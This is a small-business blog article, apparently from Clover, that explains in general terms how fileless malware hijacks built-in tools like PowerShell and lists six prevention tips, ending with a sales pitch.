What are fileless attacks? [Plus: 6 prevention strategies]

Editorial Team

6 min read
Hands typing on a keyboard

As a small business owner in a hyperconnected world, you may be familiar with how traditional phishing and malware scams work:

  • Unsuspecting employees or customers click on suspicious links.
  • In doing so, they unknowingly download a piece of malicious code.
  • Once installed, that code takes over the users’ computers.
  • The code’s creator then has unlimited access to the computers’ data.

This type of malware is a very real threat for consumers and businesses alike. However, because the malicious code is stored locally, most antivirus solutions and native security apps can detect the intrusion. In fact, phishing attacks tend to be most successful when targeting computers that either lack antivirus protection or use outdated operating systems.

Within the last several years, a different type of malware threat has emerged that has security experts concerned. Known as “fileless attacks,” this type of phishing scam doesn’t install software on a user’s hard drive. Instead, it works by hijacking native programs that already exist — essentially turning the computer against itself.

If the computers in your business are networked, the potential consequences could be catastrophic, with criminals gaining access to all your data and your customers’ data, too. This guide explains what fileless attacks are, why they’re dangerous, and how to help prevent fileless malware attacks from negatively impacting your small business.

How do fileless attacks work?

Also known as “zero-footprint” or “non-malware” attacks, this type of phishing method is much harder to detect — precisely because files aren’t downloaded or installed locally.

In most cases, the process works as follows:

  • An unsuspecting user clicks on a suspicious link.
  • The user is redirected to a website that uses Flash or some other browser-based interface.
  • Flash opens the computer’s Windows PowerShell tool and begins executing new instructions in the command code. All of this is done in the computer’s memory (i.e., RAM), not on the physical hard drive.

The code’s creator can then intercept any information sent or received through that computer. He or she can execute admin-level functions as well.

Fileless malware examples (that don’t use Flash)

You might be thinking, “No problem. Our organization doesn’t ever use Flash.” 

But, not so fast. There are many fileless malware examples in which criminals successfully exploited vulnerabilities in browsers, various Microsoft products, and countless other tools.

No matter what entry point is used, the underlying threat remains the same. Fileless attacks hijack legitimate software programs that have already been installed on the user’s machine.

Because the malicious code exists only in the computer’s memory, there aren’t any suspicious or foreign files that could raise alarms with antivirus software. Fileless attacks are also able to circumvent whitelisting — i.e., the process by which administrators must approve which apps are allowed to be installed.

To make matters worse, a fileless attack on one machine can potentially infect all other networked computers. That means computers that share the same Wi-Fi network or the same storage servers could be at risk. So, even if you’re diligent about not clicking on suspicious links, you’re not necessarily safe. If a family member or colleague gets hit by a fileless attack, your machine can also be at risk.

Fileless attack detection and prevention strategies

One of the reasons why security experts are so concerned with fileless attacks is because they can beincredibly effective:

  • In the absence of locally-stored files, detecting new fileless malware is very difficult.
  • Once a single networked computer is infected, the damage can quickly spread laterally to other machines. 

According to the Ponemon Institute, fileless attacks are 10 times more likely to succeed than are their file-based counterparts. In 2020 alone, the number of fileless attacks grew by a staggering 900%.

Compounding the issue, cybersecurity methods have yet to catch up to this persistent threat. Even though this method of cyber fraud is on the rise, fileless malware protection is still a work in progress. However, there are some common-sense strategies you can implement to help improve cyber security and make your business a less attractive target.

1. Don’t click on suspicious links

This fileless malware protection tip is both deceptively easy and difficult at the same time: “suspicious” links are becoming increasingly less suspicious-looking. Criminals know how to dress their emails, websites, and text messages to look like legitimate pieces of communication. 

Case in point: If someone sent you this article with the subject line “Common Fileless Malware Examples and How to Stop Them” — you might click on it.

Now imagine that a hacker sent you the same message and subject line — but instead of bringing you here, the embedded link took you to a strange website.

2. Keep your devices up-to-date

Always use the latest version of whatever operating system is available for your devices. Install all patches and updates when prompted.

3. Disable non-essential tools

If you’re on a Windows machine, you should disable PowerShell, Windows Management Instrumentation, and macros — unless these tools are vital to your organization’s operations. All three are legitimate programs provided by Microsoft, but they’re also the most vulnerable when it comes to fileless attacks.

4. Monitor your network’s traffic

This step has less to do with fileless malware protection and more to do with detection, but you should monitor your network’s activity to see if there are sudden spikes in traffic for which your team can’t account. Those momentary blips could indicate that someone has unauthorized access to one of your organization’s machines.

5. Implement the ‘principle of least privilege’

You should restrict every employee’s access rights to follow the “principle of least privilege”, meaning a file can only be accessed on a need-to-know basis. Lower-level staffers, for example, may not need administrative privileges if they’re only working on data entry.

6. Consider third-party solutions

Although antivirus programs aren’t very good at detecting or preventing fileless attacks, there are a growing number of third-party providers that claim to provide protection. Do your research.

A final fileless malware protection tip

Fileless attacks are hard to detect, prevent, and contain. This is especially true if you lack the IT and security know-how to:

  • Monitor network traffic
  • Assign admin roles
  • Disable critical functions

Although no single operating system is 100% immune from fileless attacks, implementing the tips above can help minimize your risk. To learn more about how Clover helps protect its merchants from cyber fraud, contact a Business Consultant today.


Popular Topics

Recent Stories

Please share your contact information
to access our premium content.